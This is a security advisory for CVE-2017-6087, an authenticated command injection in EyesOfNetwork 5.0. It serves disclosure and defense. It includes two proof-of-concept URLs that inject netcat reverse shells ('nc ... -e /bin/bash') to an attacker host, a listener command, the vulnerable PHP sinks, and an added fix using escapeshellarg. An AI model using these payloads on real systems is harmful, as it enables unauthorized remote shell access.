
EON 5.0 Remote Code Execution

Posted Mar 24, 2017
Authored by Nicolas Serra

EON versions 5.0 and below suffer from a remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2017-6087
SHA-256 | c7846fe3c70cdb527a601ecf168a4bbb668fde1a6cdac12993d51150965c4783

# [CVE-2017-6087] EON 5.0 Remote Code Execution

## Description

EyesOfNetwork ("EON") is an open-source network monitoring solution.

## Remote Code Execution (authenticated)

The Eonweb code does not correctly filter arguments, allowing
authenticated users to execute arbitrary code.

**CVE ID**: CVE-2017-6087

**Access Vector**: remote

**Security Risk**: high

**Vulnerability**: CWE-78

**CVSS Base Score**: 7.6

**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L


### Proof of Concept 1

On the attacker's host, we start a handler:

```
nc -lvp 1337
```

The `selected_events` parameter is not correctly filtered before it is
used by the `shell_exec()` function.

It is therefore possible to inject a payload, as in the request below,
which connects back to our handler:

```
https://eonweb.local/module/monitoring_ged/ged_actions.php?queue=history&action=confirm&global_action=4&selected_events%5B%5D=;nc%2010.0.5.124%201337%20-e%20/bin/bash;
```

#### Vulnerable code

The payload gets injected into the `$event[$key]` and `$ged_command`
variables of the `module/monitoring_ged/ged_functions.php` file, line 373:

```
$ged_command = "-update -type $ged_type_nbr ";
foreach ($array_ged_packets as $key => $value) {
    if($value["type"] == true){
        if($key == "owner"){
            $event[$key] = $owner;
        }
        $ged_command .= "\"".$event[$key]."\" ";
    }
}
$ged_command = trim($ged_command, " ");
shell_exec($path_ged_bin." ".$ged_command);
```

Two other functions in this file are also affected by this problem:

* `delete($selected_events, $queue);`
* `ownDisown($selected_events, $queue, $global_action);`


### Proof of Concept 2

On the attacker's host, we start a handler:

```
nc -lvp 1337
```

The `module` parameter is not correctly filtered before it is used by
the `exec()` function.

Again, we inject our connect-back payload:

```
https://eonweb.local/module/index.php?module=|nc%20192.168.1.14%201337%20-e%20/bin/bash&link=padding
```

#### Vulnerable code

In the `module/index.php` file, line 24, we can see that our payload is
injected into the `exec()` function without any sanitization:

```
# Check optional module to load
if(isset($_GET["module"]) && isset($_GET["link"])) {

    $module=exec("rpm -q ".$_GET["module"]." |grep '.eon' |wc -l");

    # Redirect to module page if rpm installed
    if($module!=0) { header('Location: '.$_GET["link"].''); }

}
```
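
The two sinks shown above, rewritten so that request data can only reach the shell as quoted arguments and never as syntax. This is an added example, not EON's code or the 5.1 patch; the function names, `/path/to/ged_bin`, `field_a` and `example-module` are hypothetical.

```php
<?php
// Added example, not EON code. Function names, the ged path and the
// sample field names are hypothetical; payloads are the page's PoC values.

// PoC 1 sink: pass every value to the ged binary as one quoted argument.
function build_ged_update_command(string $gedBin, int $typeNbr,
        array $packets, array $event, string $owner): string
{
    $args = ['-update', '-type', (string) $typeNbr];
    foreach ($packets as $key => $value) {
        if (!empty($value['type'])) {
            $args[] = ($key === 'owner') ? $owner : (string) ($event[$key] ?? '');
        }
    }
    // escapeshellarg() single-quotes each value, so ; | ` and $() stay data.
    return escapeshellarg($gedBin) . ' '
         . implode(' ', array_map('escapeshellarg', $args));
}

// PoC 2 sink: allow-list the package name before it gets near a shell.
// Requiring a leading alphanumeric also stops values beginning with "-"
// from being read by rpm as options.
function build_module_query(string $module): ?string
{
    if (preg_match('/\A[A-Za-z0-9][A-Za-z0-9._+-]{0,63}\z/', $module) !== 1) {
        return null; // caller should answer 400 and never call exec()
    }
    return 'rpm -q ' . escapeshellarg($module) . " | grep '.eon' | wc -l";
}

// Constructed inputs reusing the two payloads shown in the requests above.
$packets = ['field_a' => ['type' => true], 'owner' => ['type' => true]];
$event   = ['field_a' => ';nc 10.0.5.124 1337 -e /bin/bash;'];

// The PoC 1 value is emitted as a single inert, single-quoted argument.
echo build_ged_update_command('/path/to/ged_bin', 1, $packets, $event, 'admin'), PHP_EOL;

// The PoC 2 value fails validation, so no command string is built for it.
var_dump(build_module_query('|nc 192.168.1.14 1337 -e /bin/bash'));

// A well-formed package name (constructed) passes and is still quoted.
echo build_module_query('example-module'), PHP_EOL;
```

The same quoting rule applies to `delete()` and `ownDisown()`, which the advisory lists as affected by the first issue.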


## Timeline (dd/mm/yyyy)

* 01/10/2016 : Initial discovery.
* 09/10/2016 : First contact with vendor.
* 23/10/2016 : Technical details sent to the security contact.
* 27/10/2016 : Vendor acknowledgement and first patching attempt.
* 11/10/2016 : Testing the patch revealed that it needed more work.
* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.
* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our responsible disclosure agreement.
* 14/03/2017 : Public disclosure.

Thank you to EON for the fast response.

## Solution

Update to version 5.1

## Affected versions

* Version <= 5.0

## Credits

* Nicolas SERRA <n.serra@sysdream.com>

--
SYSDREAM Labs <labs@sysdream.com>

GPG :
47D1 E124 C43E F992 2A2E
1551 8EB4 8CD9 D5B2 59A1

* Website: https://sysdream.com/
* Twitter: @sysdream
